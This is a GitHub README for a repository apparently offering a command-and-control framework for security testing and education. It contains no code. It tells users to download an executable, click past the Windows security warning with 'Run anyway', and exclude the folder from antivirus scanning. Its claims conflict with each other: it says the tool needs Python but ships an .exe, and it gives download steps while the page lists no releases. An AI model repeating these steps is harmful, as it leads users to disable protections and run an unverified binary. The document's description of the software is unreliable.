Kenji7425/c2-framework


🛡️ c2-framework - Secure command and control for testers

Download c2-framework

This project provides a platform to study command and control systems. It assists red team leaders and security students in learning how modern networks handle traffic. The framework uses strong encryption standards like AES-256 and ECDH to secure data paths. It includes tools for certificate pinning and custom traffic profiles to simulate real-world activity.

📥 Getting Started

You need a computer running Windows 10 or 11 to use this application. Ensure you have administrative rights on your machine to install necessary components. This framework requires Python, as it operates on a Flask backend.

Follow these steps to obtain the software:

  1. Visit this link to the release page.
  2. Look for the latest version listed under the Assets section.
  3. Download the executable file ending in .exe to your local hard drive.
  4. Locate the file in your downloads folder.

⚙️ System Requirements

Before you run the software, check that your computer meets these needs:

  • Windows 10 or higher.
  • At least 4 GB of RAM.
  • A stable internet connection.
  • Python 3.9 or newer must be installed on your system.

If you do not have Python, you can find the installer on the official Python website. During installation, ensure you tick the box that says "Add Python to PATH." This setting allows the framework to find the required tools automatically.

🚀 Setting Up the Application

After you download the file, clear a space on your computer to host the framework. Follow these directions to prepare your environment:

  1. Create a new folder on your desktop and name it "c2-workspace."
  2. Move the downloaded executable file into this folder.
  3. Open the Command Prompt by typing "cmd" in your Windows search bar and pressing Enter.
  4. Type "cd Desktop\c2-workspace" and press Enter to move into your new folder.
  5. Enter the name of the executable file to start the process. For example, if the file is named "c2-tool.exe," type "c2-tool.exe" and press Enter.

The application window will open. If a Windows security prompt appears, click "More info" and then "Run anyway." This prompt occurs because the software is a specialized tool for security testing.

🛠️ Configuration and Profiles

The framework relies on Malleable C2 profiles to manage traffic. You can modify these files to change how the framework communicates with your test systems.

  1. Open the "profiles" folder within your workspace.
  2. Select a profile file. You can open these with any text editor, such as Notepad.
  3. Change the settings inside the file to match your testing goals.
  4. Save the file and restart the application to apply the changes.

The system uses AES-256 for all field data. This ensures that your test traffic remains private. You do not need to configure encryption keys because the system generates unique security tokens for each session.

🔍 Understanding the Features

This framework enables several key functions for security research:

  • ECDH Forward Secrecy: This keeps your traffic keys unique. Even if someone intercepts later data, they cannot unlock previous sessions.
  • Certificate Pinning: The framework links traffic to a specific digital certificate. This prevents attackers from listening to your test communication.
  • Flask Integration: The backend uses a lightweight web server. It handles incoming connections and manages the command loop.
  • MITRE ATT&CK Mapping: The logs produced by the tool link activity to specific tactics. This helps you understand where the traffic fits in a standard security framework.

📝 Frequently Asked Questions

Does this framework damage my computer? No. It operates as a local application for educational use. It does not perform harmful actions on your system files.

Can I use this on a home network? Yes. You can test connections between two computers on the same local network. Ensure you have your firewall settings configured to allow traffic between the research tool and your test nodes.

Is it difficult to learn? The framework follows a logical path. You define your goal, set the profile, and watch the logs. Take time to read the output in the console window to see how the system processes data.

What if the connection fails? Check that your antivirus software is not blocking the application. Some security tools may flag the framework because it mimics network-based tools used by professionals. You might need to add an exception in your antivirus settings for the "c2-workspace" folder.

📁 Troubleshooting Common Issues

If the application hangs or closes unexpectedly, check the log file located in the "logs" sub-folder. This file contains text that describes the last action taken by the tool.

Common fixes include:

  • Running the command prompt as an administrator.
  • Verifying that Python is correctly installed by typing "python --version" in your terminal.
  • Closing other network-intensive applications while running your tests.

This framework focuses on transparency. Every request sent by the system appears in the console window. If you see a warning in the console, read the text carefully to identify the network issue.

⚖️ Guidelines for Use

Use this framework only for authorized testing and educational purposes. Always seek permission before running security tests on any network. Unauthorized access is illegal and against this project's rules. The intent here is to grow your skills in penetration testing and system defense.

Keep your copies of the framework updated. Check the GitHub page periodically for new releases. Updates often contain improvements to the encryption modules and stability fixes for the Flask server.

Always keep your test environment isolated from your personal data. Virtual machines serve as an excellent host for this framework. This keeps your main operating system clean and provides a safe sandbox for your experiments.

Releases

No releases published
